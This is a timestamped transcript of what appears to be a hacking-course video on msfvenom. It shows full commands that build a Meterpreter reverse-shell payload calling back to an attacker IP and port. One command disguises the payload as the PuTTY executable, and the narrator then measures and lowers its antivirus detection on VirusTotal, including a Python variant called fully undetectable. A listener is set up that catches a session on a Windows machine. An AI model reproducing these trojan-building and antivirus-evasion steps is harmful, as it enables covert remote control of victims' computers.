00:00:00,970 --> 00:01:28,170
And here it is, the scan has finished. Right now we get the number of 38 out of 67, so we successfully managed to bypass five additional antivirus programs using the additional commands that we added to our msfvenom payload. However, let's try to make it even less than this. Just by using msfvenom, there is another option that we can use, which is -x. And if we go to the help menu right here, we can see that -x stands for template. -x allows us to use another program as a template; in other words, this means we can make our payload look similar to that other program. Now, this is sometimes known not to work, but let's give it a try and see whether we manage to bypass more antiviruses with this. For this, we can use any program that we want. I'm going to go with the program called PuTTY, so I'm going to go right here and type putty. You can use any other executable file that you want. To download PuTTY, I will click on that link. It tells me "you can download PuTTY here", I will click on "here", and if I go all the way down, I am searching for the executable files. And here it is, the 64-bit PuTTY. I will click on this and I will save it in my Downloads folder.

00:01:29,260 --> 00:03:02,780
Great, I'll click OK, and if I go right here and open the Downloads folder, I will have the PuTTY executable, and just in case you don't know, on Windows the PuTTY executable looks like this. So it has this icon and it is called putty.exe; remember how it looks. Let me just delete it real quick, and I will open a terminal in my Downloads folder. And run the command msfvenom -p windows/x64/meterpreter_reverse_tcp; LHOST will be 192.168.1.12 and LPORT will be equal to 5555. And I will only add the -x option and select the program putty.exe. Now, if you're using some other executable here, you specify the name of the other executable. Just make sure that you are located in the same directory where that executable file is in order to run this command. After that, I can specify the format of exe, and the output will be Putty.exe with a capital P. Press Enter. So the creation of the payload has finished. Let me go and show you how the payload looks on the Windows machine. Let me just find this, and if I go and copy the Putty with the capital P to my desktop, here we can see it looks exactly the same as the previous file that I showed you; just in this case, this is our Meterpreter. Let me show you real quick.

00:03:03,050 --> 00:04:31,730
If I go and open msfconsole and set up the multi/handler listener: use multi/handler, set payload to be windows/x64/meterpreter_reverse_tcp, set LHOST to be 192.168.1.12, set LPORT to be 5555, and type run here. And then I run this Putty, go back to my Kali, and we will have the third session opened. getuid: it will tell me that I am on this Windows 10 machine. OK, great. But this is out of the scope for this video. Let us check out what detection rate this newly generated payload has. So let's go right here, choose file, navigate to Downloads because that is where our Putty is. Select the payload and confirm upload. And let's see: if we generate a payload with a template, do we manage to bypass more antiviruses than with the previous two payloads? And it seems that we do. In the previous one, we had 38 out of 67. Right now we have 29 out of 69. So we managed to bypass eight additional antivirus vendors. Great. This looks better than the last two. I'm going to Ctrl+C this, or just close this.

00:04:31,730 --> 00:06:08,340
And of course, if you wanted to generate a fully undetectable payload with msfvenom, you can always change the file format, but that comes with other problems. Let me show you real quick. So if I go right here into Downloads, and let's say we wanted to generate the Windows payload, but not as an exe, rather as a Python file. We can run the command msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=192.168.1.12 LPORT=5555, and -f is something that we want to change. So it is no longer going to be exe, it is going to be a Python file, and we output it with -o as python_payload.py. Press Enter, and this will create the Windows Meterpreter payload just as a Python file. Here it is, it is done, and if we go to VirusTotal, upload the Python payload right here, confirm the upload, we can see no antivirus is able to detect it as a malicious program. It is FUD, or in other words, it is a fully undetectable payload. However, how are you going to run it on the target machine when those machines do not have Python installed by default like Linux machines do? So this payload would only be useful if the target machine has Python installed. Otherwise it is completely useless as it cannot run without Python.

00:06:09,450 --> 00:07:29,400
OK, great, we covered msfvenom and some of its commands. I advise you to experiment even more with msfvenom, and for example, you can start creating other payloads if you want. We only created Windows payloads, but if you have a Linux machine or a macOS machine that you want to attack, you can generate payloads for those operating systems as well. To check out all the available payloads that you can create, you can type the command right here: msfvenom --list payloads, and here we can see a lot of different ones. We can go up here. Here are only Windows payloads, but if we scroll all the way up, here are Solaris payloads, Ruby payloads, and these are just some programming languages, but here, if we scroll all the way up, we get to the OSX payloads, so you can attack OSX operating systems. If we go even more up, here are Linux operating systems and Linux Meterpreter reverse TCP payloads. We also get the shell payloads. We get up here to Linux payloads for the 64-bit systems as well. So you can attack any operating system that you want. Great, now that we took a look at msfvenom and we covered some of its options, let's also take a look at some other tools that we can use for payload creation. See you in the next video.